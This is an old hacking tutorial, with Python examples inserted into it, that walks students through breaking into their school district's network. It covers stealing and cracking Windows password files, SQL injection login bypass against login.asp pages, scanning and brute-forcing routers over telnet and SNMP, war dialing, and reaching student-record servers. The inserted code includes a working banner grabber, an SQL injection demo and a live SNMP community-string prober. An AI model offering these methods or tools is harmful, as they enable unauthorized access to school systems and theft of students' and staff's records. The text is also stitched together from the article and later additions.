Section 1: Accessing the Shared Network
----------------------------------------

Computer class (if you have one) is of course a good place to start. Your computer class will almost certainly be running some version of Windows (not always the case, but usually...), so let's start from there. On these machines there are usually two levels of rights, user and administrator, so our first goal is to jump from user (the privileges you currently have) to administrator.

If the operating system is Windows 9.x there is no real privilege separation on the box at all; what we are after is the *.pwl file, which is where Windows 9.x caches the passwords a user has saved for network shares and other resources. There is one per login name, named after the username (USERNAME.PWL), in the Windows directory, so look for the one belonging to whoever administers the machine. Just sneak in a floppy disk during class and copy the file to the floppy. Then take it home and run it through a PWL cracker. Try a dictionary crack first (just collect yourself a few word lists); if you have to fall back on brute force, set it to lower-case letters, 1 to 10 characters. It'll take a while to crack, so be patient.

If the operating system is Windows XP or 2000 the usual trick is to boot the machine from a Windows 2000 or XP CD (download one off Kazaa or Overnet if you don't have a copy) and start the Recovery Console, a troubleshooting command line that gives you the run of the local disk. Be aware that the Recovery Console asks for the local Administrator password of the installation before it lets you in, unless the policy "Recovery console: Allow automatic administrative logon" has been switched on, and it is off by default. The trick still works far more often than it should because on Windows XP Home, and on plenty of carelessly installed XP Pro boxes, the built-in Administrator account has a blank password that nobody ever set. So you are not bypassing the password so much as betting that there isn't one.

Now that you have administrator privileges, open "Network Neighborhood" (called "My Network Places" on 2000/XP) and take a look through the network. Copy a few addresses (anything that seems interesting). If the machines are Win9.x those are plain SMB shares, and a browser will open them as file://[target address] (the same thing as \\host\share in Explorer). The catch is that this only works from a machine that can actually reach NetBIOS/SMB (ports 137-139, or 445) on the target, which in practice means from inside the school network. From home across the Internet the district's router or firewall will almost always block it, so treat this as an on-site trick rather than a remote one.
This is network access, but not the kind that will allow you to gain superuser access (unless the software the teachers use for accessing/modifying/deleting student records happens to be installed on the computer, and the password just conveniently happens to be the same one the teacher uses on the Windows administrator account... which is not entirely far fetched). If the computer you are using is Win2k (Windows 2000), use the newest version of pwdump2 to dump the password hashes out of the SAM (it needs the administrator rights you just got, since it reads them through LSASS), and then run the dump through L0phtcrack to break them.

P.S. If you don't have a computer class, then you can try the computers at the library.

Section 2: Network Exploitation
-------------------------------

Now let's talk network operating systems (NOSs). If your school uses Windows workgroups as its NOS, then the method described above would be your way in. If the NOS is not Windows workgroups, it is most likely Novell NetWare, so let's get into Novell.

Novell NetWare is a server-based network operating system. A NetWare server (3.x and 4.x especially) boots from DOS, and the CDs bundled DR-DOS for the purpose (DR-DOS was written by Digital Research, then owned by Novell, then sold to Caldera, which is why it is also known as Caldera DOS), but DOS is only the loader; once SERVER.EXE starts, NetWare runs its own kernel and DOS can be unloaded altogether. NetWare's native transport is IPX/SPX (Internetwork Packet eXchange / Sequenced Packet eXchange), which is Novell's own protocol suite and not compatible with TCP/IP. The file and print service protocol that runs on top of it is NCP (NetWare Core Protocol), and from NetWare 5 on NCP can also run natively over TCP/IP, which is how the later versions talk to ordinary IP networks.

In a school district's NetWare setup there are typically four tiers of access handed out (these are the district's roles, not NetWare's own rights model, which is trustee rights assigned to users and groups on files, directories and NDS objects). There is user, which gives access to //public and some other basic files. There is superuser, which is the access given to teachers: with it they can view and delete student files whenever necessary, but they cannot delete, create, or change accounts. There is supervisor, which is the access administrators give themselves to work from. And finally there is console, direct access to the server console (locally or through RCONSOLE), which is the highest level of control one can have on a NetWare server.
Now since there have already been many articles written on Novell network infiltration (and I'm in a lazy mood) I am going to point you in the direction of articles that I had posted up from a previous article on a very similar subject (exactly the same subject actually, but targeted at a specific school network)...

Novell Netware v1.x-4.x: http://www.geocities.com/anti_dcss/novell_faq.zip
Novell Netware v3.12-4.x: http://www.geocities.com/anti_dcss/novzero.zip
Novell Netware v5.x: http://www.geocities.com/anti_dcss/hack_novell.zip

There is also AppleTalk, which may be implemented in order to integrate the Macintosh computers with the rest of the network, but it isn't really necessary to exploit AppleTalk so I won't get into it.

Now let's get into exploiting the network from a remote location, which I'm sure is what most of you want to do. Let's start off with the school's website (if your school happens to have one). The simplest way to find out what web server the school is running is to telnet to port 80 and type the request by hand, but instead of asking for the page as it is, change the extension from .html or .htm to something like .htmx. That forces the server to answer with its own error page rather than a real object. The product and version are in the Server: header of the response (that header is on every response, error or not, so the bogus extension is mostly about getting the server's stock 404 page, which on Apache also prints "Apache/x.y.z Server at host Port 80" in the body).

If the server turns out to be IIS, there is a fair chance the site has a login.asp page. Login pages built the classic ASP way, with the username and password pasted straight into the SQL string, can be bypassed with SQL injection, which gets you in as a legitimate user of the web application; whether that reaches into the internal network depends on what that web server can itself talk to. It also tends not to raise any eyebrows from security (it will only show up as an error 500 I believe, though my memory is a bit vague). What actually lands in the web log: a successful injection looks like any other POST to login.asp, while a failed attempt, where the injected quote breaks the query, comes back as a 500 with an ODBC error, and that one does get logged.

If this is not an option then you can perform a netscan (scan from xxx.xxx.xxx.1 to xxx.xxx.xxx.254) of the netblock the web site's IP address belongs to, in order to find other servers (ftp, remote administration, etc.) that you can use to crawl into the internal network. Check first (whois on the address) that the web server is actually on the district's own range and not at some hosting company, or you will be scanning the wrong network entirely. For example, the router will usually be addressed on *.1.
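Here is the banner grab from above done in Python instead of by hand in a telnet window. This is an added example, not code from the article: it builds the same request with a bogus .htmx extension, parses the Server: and X-Powered-By: headers out of the reply, and also picks the "Apache/x.y.z Server at" footer out of the body. The host name www.example.org and the two sample responses are constructed for the example, not captured from any real server.

```python
"""HTTP banner grab: ask for a path that cannot exist and read the server's
identity off its own error page.  Added example, not code from the article.
grab() talks to a live host; parse_server_banner() works on captured bytes."""
import re
import socket

def banner_request(host, path="/index.htmx"):
    # A bogus extension means no real object matches, so the server serves its
    # stock 404.  HTTP/1.0 so the server closes the connection when it is done.
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")

def parse_server_banner(raw):
    """Extract status code, Server:, X-Powered-By: and any 'Apache/x.y Server at'
    footer from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = lines[0].split(" ", 2)
    text = body.decode("latin-1", "replace")
    footer = re.search(r"([\w-]+/[\w.]+) Server at ", text)
    return {
        "status": int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None,
        "server": headers.get("server"),
        "powered_by": headers.get("x-powered-by"),
        "body_signature": footer.group(1) if footer else None,
    }

def split_product(server):
    """'Microsoft-IIS/5.0' -> ('Microsoft-IIS', '5.0'); no slash -> version None."""
    if not server:
        return None, None
    product, _, version = server.split()[0].partition("/")
    return product, version or None

def grab(host, port=80, timeout=5.0):
    """Connect, send the bogus request, read until the server closes, parse."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(banner_request(host))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return parse_server_banner(b"".join(chunks))

# Constructed sample responses (not captures) in the style of the servers of the day.
SAMPLE_IIS = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body>The page cannot be found</body></html>"
)
SAMPLE_APACHE = (
    b"HTTP/1.1 404 Not Found\r\n"
    b"Server: Apache/1.3.27 (Unix) PHP/4.3.1\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<h1>Not Found</h1><address>Apache/1.3.27 Server at www.example.org Port 80</address>"
)

if __name__ == "__main__":
    for sample in (SAMPLE_IIS, SAMPLE_APACHE):
        print(parse_server_banner(sample))
```

To use it against a live site call grab("host") and look at the "server" field; split_product() separates the product from the version so you can look the version up afterwards. Custom 404 pages and reverse proxies can strip or rewrite the header, which is why the body footer is checked as well.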
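The login.asp bypass, as an added example (not code from the article) of why the classic string-built login query is injectable: the same query built by concatenation and with bound parameters, run against a constructed users table with the two standard payloads, plus a probe that shows the kind of malformed input that produces the database error behind the 500 mentioned above. Python's sqlite3 stands in for the ASP/ODBC stack the article has in mind; the usernames, passwords and roles are made up for the demo.

```python
"""Login bypass by SQL injection against a string-built query, beside the
parameterized version.  Added example; sqlite3 stands in for the ASP/ODBC
backend, and the users table is constructed for the demo."""
import sqlite3

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "correct-horse", "admin"),    # constructed rows
        ("jsmith", "hunter2", "teacher"),
    ])
    return con

def login_vulnerable(con, username, password):
    """The classic ASP pattern: input spliced into the SQL text, so a quote in
    the input ends the string literal and whatever follows is parsed as SQL."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return con.execute(sql).fetchone()

def login_safe(con, username, password):
    """Same query with bound parameters: the driver passes the values separately,
    so quotes and comment markers are just characters inside the data."""
    return con.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()

def probe_vulnerable(con, username, password):
    """Return ('row', row) or ('error', message).  A DB error is what the web
    server reports as a 500 (on IIS, an ODBC error page) and writes to its log;
    a working bypass returns a row and looks like an ordinary login."""
    try:
        return "row", login_vulnerable(con, username, password)
    except sqlite3.Error as exc:
        return "error", str(exc)

# The two payloads that bypass the vulnerable form:
#   username "admin'--"     -> WHERE username = 'admin'--' AND password = '...'
#                              (everything after -- is a comment)
#   password "' OR '1'='1"  -> ... AND password = '' OR '1'='1'  (true for every row)

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment payload :", login_vulnerable(db, "admin'--", "whatever"))
    print("vulnerable, OR payload      :", login_vulnerable(db, "nobody", "' OR '1'='1"))
    print("safe, comment payload       :", login_safe(db, "admin'--", "whatever"))
    print("vulnerable, broken quoting  :", probe_vulnerable(db, "x'", "y"))
```

The point of probe_vulnerable() is the log trail discussed above: the payloads that work return a row and leave nothing unusual in the web server log, while the malformed one raises the database error that IIS would turn into a 500.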
If you do a quick port scan on the router you will usually find a telnet server (23), SNMP (161), or both. If telnet is open you can exploit the fact that telnet sessions are unencrypted: tools like Juggernaut, Hunt or IP Watcher will sniff a session for sensitive information (passwords of course) or hijack it outright. The catch is that they need to see the packets, so your machine has to sit on the same segment as the admin or somewhere on the path to the router; none of that works from across the Internet. Remotely, that leaves you with trying to crack the telnet prompt with a tool like Brutus. SNMP is protected only by community strings, which travel in the clear and are very often left at the vendor defaults: "public" for read-only and "private" for read-write. If the defaults don't work you can use a community string brute forcer (SolarWinds ships one) against the router. One thing to know about how those brute forcers work: an SNMPv1 agent does not send back an error for a wrong community, it simply drops the request, so the tool is just watching for which guess gets a reply.

There are other servers, of course, that you will find on the net range that I will not get into, because it will be up to you to do the research necessary (find out which servers are running and which versions they are, what they are vulnerable to, etc).

Sometimes you can also do it the old school way and war dial the school (like you see in the movie WarGames), scanning a whole exchange, to find an open modem that drops you straight into the internal network (you may think such methods are outdated, but you would be surprised). Set the range for the scan based on one of the public phone numbers of the school district itself, not the school you are attending, because as you may have noticed from this article, the internal network belongs to the school district, and the individual schools are separate networks routed together.

I'm sure school districts are also jumping into wireless technology, and it's a possibility (depending on school funding and the district's awareness) that your school has implemented it on the internal network to provide convenience and efficiency for the staff of the school district.
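The SNMP community string check from above at the packet level, as an added example (standard-library Python, not code from the article or from SolarWinds), so you can see what a community guess actually is: one SNMPv1 GetRequest for sysDescr.0 per candidate string, with a reply before the timeout as the only success signal. probe() sends real packets; the builder and parser are what the test exercises, and the GetResponse in the test is constructed with the example's own encoder rather than captured from a device. The default community list and the OID are the standard ones; everything else is assumed for the demo.

```python
"""SNMPv1 community-string check, standard library only (added example, not
from the article).  build_get_request()/parse_response() do the BER work;
probe() puts packets on the wire."""
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"               # sysDescr.0, readable with any read community
DEFAULT_COMMUNITIES = ["public", "private"]  # read-only / read-write vendor defaults

def ber_len(n):
    # BER length: one byte below 128, otherwise 0x80|count followed by the length bytes.
    if n < 128:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body

def encode_int(n):
    # Non-negative INTEGER; a leading 0x00 stops the high bit reading as a sign bit.
    body = n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")
    return tlv(0x02, (b"\x00" if body[0] & 0x80 else b"") + body)

def encode_octet_string(s):
    return tlv(0x04, s.encode("latin-1") if isinstance(s, str) else s)

def encode_oid(oid):
    ids = [int(x) for x in oid.split(".")]
    body = bytearray([40 * ids[0] + ids[1]])      # first two arcs share one byte
    for sub in ids[2:]:
        chunk = [sub & 0x7F]                      # base 128, high bit set on all but the last
        sub >>= 7
        while sub:
            chunk.append(0x80 | (sub & 0x7F))
            sub >>= 7
        body += bytes(reversed(chunk))
    return tlv(0x06, bytes(body))

def encode_pdu(pdu_tag, request_id, varbinds):
    # varbinds: [(oid, encoded value TLV)]; error-status and error-index are 0 in a request.
    vbl = b"".join(tlv(0x30, encode_oid(o) + v) for o, v in varbinds)
    return tlv(pdu_tag, encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, vbl))

def build_message(community, pdu):
    return tlv(0x30, encode_int(0) + encode_octet_string(community) + pdu)  # version 0 = SNMPv1

def build_get_request(community, oid=SYS_DESCR, request_id=1):
    return build_message(community, encode_pdu(0xA0, request_id, [(oid, b"\x05\x00")]))  # NULL value

def parse_tlv(buf, pos=0):
    tag, ln = buf[pos], buf[pos + 1]
    pos += 2
    if ln & 0x80:                                 # long form: (ln & 0x7F) length bytes follow
        n = ln & 0x7F
        ln = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + ln], pos + ln

def children(body):
    out, pos = [], 0
    while pos < len(body):
        tag, val, pos = parse_tlv(body, pos)
        out.append((tag, val))
    return out

def decode_oid(body):
    ids, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            ids.append(cur)
            cur = 0
    return ".".join(map(str, ids))

def parse_response(datagram):
    """Decode a GetResponse into community, request-id, error-status and varbinds."""
    tag, body, _ = parse_tlv(datagram)
    (_, _version), (_, community), (pdu_tag, pdu) = children(body)
    if tag != 0x30 or pdu_tag != 0xA2:
        raise ValueError("not an SNMPv1 GetResponse")
    (_, rid), (_, err), (_, _idx), (_, vbl) = children(pdu)
    varbinds = []
    for _, vb in children(vbl):
        (_, oid), (vtag, val) = children(vb)
        varbinds.append((decode_oid(oid), val.decode("latin-1") if vtag == 0x04 else val))
    return {"community": community.decode("latin-1"),
            "request_id": int.from_bytes(rid, "big"),
            "error_status": int.from_bytes(err, "big"),
            "varbinds": varbinds}

def probe(host, communities=DEFAULT_COMMUNITIES, port=161, timeout=2.0):
    """Try each community; return (community, varbinds) for the first one the
    agent answers, else None.  An SNMPv1 agent sends no error for a bad
    community, it just stays silent, so the timeout is the 'wrong guess' signal."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        for rid, community in enumerate(communities, start=1):
            sock.sendto(build_get_request(community, request_id=rid), (host, port))
            try:
                data, _ = sock.recvfrom(4096)
            except socket.timeout:
                continue
            reply = parse_response(data)
            if reply["request_id"] == rid and reply["error_status"] == 0:
                return community, reply["varbinds"]
    finally:
        sock.close()
    return None
```

Each guess gets its own request-id so a late reply to an earlier guess is not credited to the wrong string. Reading sysDescr.0 is enough to prove a community works; what that string lets you do beyond reading depends on whether the agent treats it as read-only or read-write, which the device's configuration decides, not the string's name.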
For an introduction to wireless technologies and how one can exploit such implementations I would highly suggest reading my System Cracking 2k article (which you can find with a quick Google search).

Note: If the teachers at your school use a program called TSIS to manage student records, then usually there will also be a TSIS remote login server on the network. Using a scanner you should be able to pick up on this. The address is usually...

http://tsis.(county name).k12.(state initials).us

If you happen to find one of these, then you can probably use a technique like passive packet sniffing (if you are positioned where you can see the traffic) or brute-forcing the HTTP login to gain access into the internal network.